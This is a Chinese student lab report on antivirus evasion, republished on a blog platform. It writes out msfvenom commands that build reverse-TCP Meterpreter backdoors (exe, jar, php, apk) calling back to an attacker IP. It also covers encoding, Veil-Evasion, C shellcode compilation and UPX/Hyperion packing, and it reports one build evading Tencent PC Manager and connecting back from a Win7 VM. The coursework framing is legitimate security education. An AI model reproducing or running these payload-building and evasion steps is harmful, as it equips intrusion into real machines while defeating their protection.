20165306 Exp3 免杀原理与实践

最新推荐文章于 2024-05-01 19:17:00 发布
最新推荐文章于 2024-05-01 19:17:00 发布
阅读量123 收藏 1
点赞数
文章标签: 运维 c/c++ 移动开发
原文链接:http://www.cnblogs.com/5306xyh/p/10626872.html
版权

Exp3 免杀原理与实践

一、实践内容概述

1.正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,加壳工具,使用shellcode编程

2.通过组合应用各种技术实现恶意代码免杀

3.用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本

4.基础问题回答

(1)杀软是如何检测出恶意代码的?
  • 基于特征码的检测
    • 简单来说一段特征码就是一段或多段数据。如果一个可执行文件(或其他运行的库、脚本等)包含这样的数据则被认为是恶意代码。
    • AV软件厂商要做的就是尽量搜集最全的、最新的特征码库。所以杀毒软件的更新很重要。过时的特征码库就是没有用的库。
  • 启发式恶意软件检测
    • 如果一个软件在干通常是恶意软件干的事,看起来像个恶意软件,那我们就把它当成一个恶意软件。
    • 优点:可以检测0-day恶意软件;具有一定通用性。
    • 缺点:实时监控系统行为,开销稍多;没有基于特征码的精确度高。
  • 基于行为的恶意软件检测
    • 基于行为的检测相当于是启发式的一种,或者是加入了行为监控的启发式。
(2)免杀是做什么?

一般是对恶意软件做处理,让它不被杀毒软件所检测,也是渗透测试中需要使用到的技术。

(3)免杀的基本方法有哪些?
  • 改变特征码
    • 如果你手里只有EXE:加壳--压缩壳、加密壳。
    • 有shellcode(像Meterpreter):用encode进行编码;基于payload重新编译生成可执行文件。
    • 有源代码:用其他语言进行重写再编译(veil-evasion)。
  • 改变行为
    • 通讯方式:尽量使用反弹式连接;使用隧道技术;加密通讯数据。
    • 操作模式:基于内存操作;减少对系统的修改;加入混淆作用的正常功能代码。
  • 非常规方法
    • 使用一个有漏洞的应用当成后门,编写攻击代码集成到如MSF中。
    • 使用社工类攻击,诱骗目标关闭AV软件。
    • 纯手工打造一个恶意软件。

二、实践具体步骤

(一)任务一: 正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,使用shellcode编程,加壳工具

1.正确使用msf编码器

  • 输入指令# msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b ‘\x00’ LHOST=192.168.19.128 LPORT=5306 -f exe > msf5306.exe生成exe文件

1296616-20190330140238499-676940400.png

  • Windows自带杀毒软件发现了它

1296616-20190330140253237-1109618981.png

  • 关闭防火墙和实时保护,使用VirusTotal进行扫描

1296616-20190330140307071-1810330985.png

1296616-20190330140319664-579377629.png

  • 开启电脑管家

1296616-20190331191546380-1898522057.png

  • 编码多次仍被检测出来的原因:
    • shikata_ga_nai总会有解码(decoder stub)部分需要加入的exe中,只要盯住这部分就可以了。
    • 模板是msfvenom用来生成最终Exe的那个壳子exe文件,msfvenom会以固定的模板生成exe,所有它生成的exe,如果使用默认参数或模板,也有一定的固定特征。如果使用msfvenom免杀,就要使用原生的模板。

2.msfvenom生成如jar之类的其他文件

  • 输入指令msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.19.128 LPORT=5306 x > 5306_java_backdoor.jar生成java后门程序

1296616-20190330140332583-1981701943.png

  • 扫描结果如下

1296616-20190330140429524-211190256.png

  • 开启电脑管家

1296616-20190331191622447-692429884.png

  • 输入指令msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.19.128 LPORT=5306 x> 5306_php_backdoor.php生成php后门程序

1296616-20190330140441198-1178802807.png

  • 扫描结果如下

1296616-20190330140453130-755592218.png

  • 开启电脑管家

1296616-20190331191641289-1047061880.png

  • 输入指令msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.19.128 LPORT=5306 x> 5306_android_backdoor.apk生成Android后门程序

1296616-20190330140507430-143769305.png

  • 扫描结果如下

1296616-20190330140522821-683389707.png

  • 开启电脑管家

1296616-20190331191658116-156737722.png

3.使用veil-evasion生成后门程序及检测

  • 打开热点
  • git clone https://www.github.com/Veil-Framework/Veil-Evasion.git从github上进行clone下载
  • 下载完成后,安装软件配置包,依次输入指令ls,cd Veil-Evasion,ls,cd setup,./setup.sh
  • 询问是否继续安装时,输入Y
  • 跳出python for windows安装界面,一路点击Next,Finish,Accept

1296616-20190331001639467-1239155962.png

1296616-20190331001653642-597391663.png

1296616-20190331001704898-1645257067.png

1296616-20190331001712838-10734834.png

1296616-20190331001721726-1361193254.png

1296616-20190331001731529-1880746557.png

1296616-20190331001740131-2129077230.png

1296616-20190331001746787-572055027.png

  • 出现Setup-Ruby1.8.7-p371时,全选中复选框,点击Install

1296616-20190331001856197-291204404.png

1296616-20190331002709131-1095671566.png

1296616-20190331002840178-1336786854.png

  • 输入list

1296616-20190331003020118-670440188.png

  • 选择6) c/meterpreter/rev_tcp

1296616-20190331160046412-2028215865.png

  • 依次输入命令set LHOST 192.168.19.128(Kali的IP),set LPORT 5306options

1296616-20190331002030519-1724562189.png

  • 输入指令generate生成文件,输入payload名字veil53061

1296616-20190331002044245-576740979.png

  • 依图中所示路径,找到了veil53061.exe,小小地开心一哈~

1296616-20190331002056712-1671975817.png

  • 用virustotal检测一下,还是被发现了

1296616-20190331002109567-962684115.png

  • 开启电脑管家

1296616-20190331192205197-1534807687.png

  • 注:下次进入veil,需先进入到有Veil-Evasion的文件夹,然后输入指令./Veil-Evasion.py

1296616-20190331155557124-24874964.png

4.C语言调用Shellcode

  • 输入指令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.19.128 LPORT=5306 -f c用C语言生成一段shellcode

1296616-20190331120051150-1976695250.png

  • touch 20165306buf.c创建一个文件,将刚刚生成的unsigned char buf[]复制到其中

1296616-20190331120106535-909873904.png

  • 输入指令i686-w64-mingw32-g++ 20165306buf.c -o 20165306buf.exe生成可执行文件

1296616-20190331120120435-793689026.png

  • 用virustotal检测如下

1296616-20190331120134402-718421564.png

  • 开启电脑管家

1296616-20190331193043636-1893634576.png

5.加壳


- 加壳的全称应该是可执行程序资源压缩,压缩后的程序可以直接运行。

- 加壳的另一种常用的方式是在二进制的程序中植入一段代码,在运行的时候优先取得程序的控制权,之后再把控制权交还给原始代码,这样做的目的是为了隐藏程序真正的OEP(入口点,防止被破解)。大多数病毒就是基于此原理。

- 加壳的程序需要阻止外部程序或软件对加壳程序本身的反汇编分析或者动态分析,以达到保护壳内原始程序以及软件不被外部程序破坏,保证原始程序正常运行。

- 这种技术也常用来保护软件版权,防止软件被破解。但对于病毒,加壳可以绕过一些杀毒软件的扫描,从而实现它作为病毒的一些入侵或破坏的一些特性。

- MSF的编码器使用类似方法,对shellcode进行再编码。

- 从技术上分壳分为:

    - 压缩壳:减少应用体积,如ASPack,UPX
    - 加密壳:版权保护,反跟踪。如ASProtect,Armadillo
    - 虚拟机:通过类似编译手段,将应用指令转换为自己设计的指令集。如VMProtect, Themida
  • 压缩壳(UPX)

20165306buf.exe加个壳得到5306_upxed.exe

1296616-20190331120157700-756253167.png

用virustotal检测如下

1296616-20190331120211641-1552896724.png

  • 开启电脑管家

1296616-20190331193126692-1777947736.png

  • 加密壳(Hyperion)

5306_upxed.exe拷贝到/usr/share/windows-binaries/hyperion/目录中

进入目录/usr/share/windows-binaries/hyperion/

输入指令wine hyperion.exe -v 5306_upxed.exe 5306_upxed_Hyperion.exe加壳

1296616-20190331120229083-687984364.png

1296616-20190331120242219-1723862886.png

被Windows自带杀软发现

1296616-20190331120258730-719954529.png

用virustotal检测如下

1296616-20190331120311439-2033600965.png

  • 开启电脑管家

1296616-20190331193216567-1482221155.png

(二)任务二:通过组合应用各种技术实现恶意代码免杀

  • C语言调用shellcode+加密壳+压缩壳

1296616-20190331214740779-980739013.png

  • 使用msfconsole回连

1296616-20190331214758049-1678624315.png

  • 电脑管家13.3.20237.212没有发现

1296616-20190331214816141-484186016.png

(三)任务三:用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本

受害者:win7虚拟机

杀毒软件:电脑管家13.3.20237.212

  • 20165306buf加密壳,再压缩壳,生成5306buf_Hyperion_upxed.exe

1296616-20190331144425942-97899906.png

  • 将Win7虚拟机和Kali ping通,在Win7中设置共享文件夹,安装ncat

1296616-20190331144443863-105697823.png

  • 使用msfconsole回连

1296616-20190331145446215-871152570.png

1296616-20190331145506131-160307592.png

  • Win7的电脑管家没有发现

1296616-20190331144554697-428611150.png

  • 20165306buf.exe加压缩壳生成20165306buf_upxed.exe,室友电脑帮忙扫描

1296616-20190331172837003-528159524.png

1296616-20190331172847954-1594737389.png

三、实验中遇到的问题

问题1:无法获得锁

1296616-20190331144619974-1681871454.png

  • 原因:其他进程占用了自己要使用的资源

  • 解决:ps aux | grep "apt-get"列出所有占用apt资源的进程,sudo kill 进程id结束其他进程,然后输入指令sudo rm /var/cache/apt/archives/locksudo rm /var/lib/dpkg/lock

参考解决方法

问题2:远端意外挂断了

  • 原因:也许是校园网的问题

1296616-20190331144649383-48381278.png

问题3:无法打开加过压缩壳的文件

1296616-20190331144711807-217922680.png

  • 解决:重新把5306_upxed.exe拷贝到指定目录下,确保拷贝成功后,再执行下面的指令

1296616-20190331144728767-48409128.png

问题4:win7和kali ping不通

1296616-20190331144802019-1769135370.png

  • 解决:如下图改成桥接模式

1296616-20190331144829079-1488970674.png

1296616-20190331144841120-1428146763.png

成功ping通

1296616-20190331144856855-1895081353.png

四、实验体会

1.时刻加强防范意识

2.懂得借力≠完全依靠他人。

装veil时我参考了许多同学的博客,装了一下午还是失败,本来想拷同学的虚拟机,但出于和自己较劲的心态,终于找到了适合自己的教程并安装成功,有小小的成就感。继续加油呀~

3.认真阅读实验要求,多看多问多思考,不要想当然。感谢学长的耐心指导!

  • 修改主机名!

1296616-20190331231453300-461582652.png

转载于:https://www.cnblogs.com/5306xyh/p/10626872.html

weixin_33877885
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Python3中exp()函数用法分析
09-19
在本篇文章里小编给大家整理了关于Python3中exp()函数用法以及相关知识点,需要的朋友们学习下。
Exp3-免杀原理实践-20202127
qq_57435798的博客
03-29 498
本此实验遇到的比较大的问题就是veil的安装,当时反复出现wine32缺失的报错,按照系统给的命令操作之后,却又一直卡在某一行,我也不知道是这一步就应该等待这么久还是我的操作出现了问题,反复多次尝试之后,我在操作到那一步之后,出去吃了顿晚饭,回来之后就惊喜地发现veil已经安装完毕,由此,我也确定了我的操作并没有问题,只是确实需要等待很久。同时,由于恶意代码也会随着科技进步发展变化,只能说是最大程度地去防止恶意代码,而且不同的杀软有不同的性能,对于恶意代码的防范也有一定的局限性,所以绝对是很难做到的!
EXP3 免杀原理实践
ISrookie的博客
04-06 529
exp3 免杀原理
Exp3 免杀原理实践 20164320 王浩
weixin_34409741的博客
03-31 118
一、实验内容 1.1 正确使用msf编码器(0.5分),msfvenom生成如jar之类的其他文件(0.5分),veil-evasion(0.5分),加壳工具(0.5分),使用shellcode编程(1分) 1.2 通过组合应用各种技术实现恶意代码免杀(0.5分)(如果成功实现了免杀的,简单语言描述原理,不要截图。与杀软共生的结果验证要截图。) 1.3 用另一电脑实测,在杀软开启的情况下,可...
20155339 Exp3 免杀原理实践
weixin_30672295的博客
04-08 102
20155339 Exp3 免杀原理实践 基础问题 (1)杀软是如何检测出恶意代码的? 基于特征码的检测(杀软的特征库中包含了一些数据或者数据段,杀软会尽可能的更新这个特征库,以包括尽可能多的恶意代码,当一个可执行文件(或其他运行的库、脚本等)包含这样的数据则被认为是恶意代码)。 启发式恶意软件检测(很简单,就是根据些片面特征去推断,也就是进行检测,当某个软件或者程序想干一些看起来...
id3lib.exp_release_Creating_id3lib_exp_
10-02
C++ library for creating and manipulating id3v1/2 tags.Copyright 2002 2003 Thijmen Klok
exploit.tar(DC3靶机所需提权exp-1)
02-20
39772.zip
exp3[1].rar_滤波 exp
09-21
利用窗函数设计FIR滤波器,2、 设计一个线性相位有限冲激响应低通滤波器,使其满足如下指标:通带边界为2kHz,阻带边界为2.5kHz,通带波纹 =0.005,阻带波纹 =0.005,抽样率为10kHz。分别采用多尔夫-切比雪夫窗进行...
Docker consul的容器服务更新与发现
YUEAwb的博客
04-29 771
consul是google开源的一个使用go语言开发的服务管理软件。支持多数据中心、分布式高可用的、服务发现和配置共享。采用Raft算法,用来保证服务的高可用。内置了服务注册与发现框架、分布一致性协议实现、健康检查、Key/Value存储、多数据中心方案,不再需要依赖其他工具(比如ZooKeeper等)。服务部署简单,只有一个可运行的二进制的包。每个节点都需要运行agent,他有两种运行模式server 和 client。
Virtualbox7.0.10--创建虚拟机
醉殇姒若梦遗年 ツ的博客
04-29 367
6.完成后的界面,至此虚拟机新建完成。左侧是我们新建的虚拟电脑,右侧是它的一些配置项,右侧上方,我们可以点击【注册】进行导入一个操作系统的镜像,【启动】可以直接启动虚拟电脑。虚拟电脑名称为Ubuntu20.04,文件夹存放在D盘,虚拟光盘可以暂时不选,系统类型设置为Linux,版本设置为Ubuntu(64-bit),设置好以后单击“4.内存配置好后,就需要配置下硬盘了,主要是硬盘的容量,默认是25G,可以不改,直接。5.最后,再确认一下整体的配置,如果没有问题,可以直接点击“”,进入新建虚拟电脑页面。
用Docker单独安装xiaoya-alist
wbsu2004的博客
04-29 2080
小雅是资源聚合站,通过自己的阿里云盘中转缓存资源,可以实现大量的资源在线播放。
Spring Cloud——LoadBalancer
最新发布
????
05-01 1088
这里只是简单的讲解了一下LoadBalancer如何使用,因为实际上我们使用的不是很多,主要还是使用OpenFeign。
云计算知识点-02
lv785的博客
04-27 1469
DataNode是HDFS文件系统的工作节点,DataNode会按照客户端或者是NameNode的调度来存储和检索数据,并定期向NameNode发送它所存储的数据块列表,DataNode是文件系统中真正存储数据的地方。通过这种虚拟化可以减少服务器的数量,提高服务器的使用效率,可以在一定程度上摆脱物理上的空间限制,实现随时随地随需的自由掌控。Glance(镜像服务组件),其作用是:提供虚拟机镜像的存储,查询和检索功能,为nova进行服务,依赖于存储服务(存储镜像本身)和数据库服务(存储镜像相关的数据)。
lua编译器介绍
笨死的猪Blog
04-27 748
Lua编译器是将Lua语言编写的源代码转换为可执行代码的工具。
解决主机有网络但虚拟机没网络连接问题----记录
Iamsonice的博客
04-27 583
发现只有lo本地回环网卡ip并没有真实网卡IP。
MacosM3(一)Docker安装
qq_33326733的博客
04-28 151
1、打开Docker官网,2、选择AppleChip。4、查看是否安装成功。
用 Python 进行渗透测试
黑战士的博客
04-28 965
编写一个端口扫描器Python 提供了访问 BSD 套接字的接口Web 服务器可能位于 TCP 80 端口、电子邮件服务器在 TCP 25 端口、FTP 服务器在 TCP 21 端口TCP 全连接扫描为了抓取目标主机上应用的 Banner,找到开放的端口后,向它发送一个数据串并等待响应。
exp8266物联网开发板原理
05-26
ESP8266物联网开发板的原理是通过ESP8266模块实现与WiFi网络的连接,并通过串口与外部设备(如传感器、执行器等)进行通信,从而实现物联网设备的控制和数据传输。用户可以通过编程语言(如C语言、Python等)编写...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值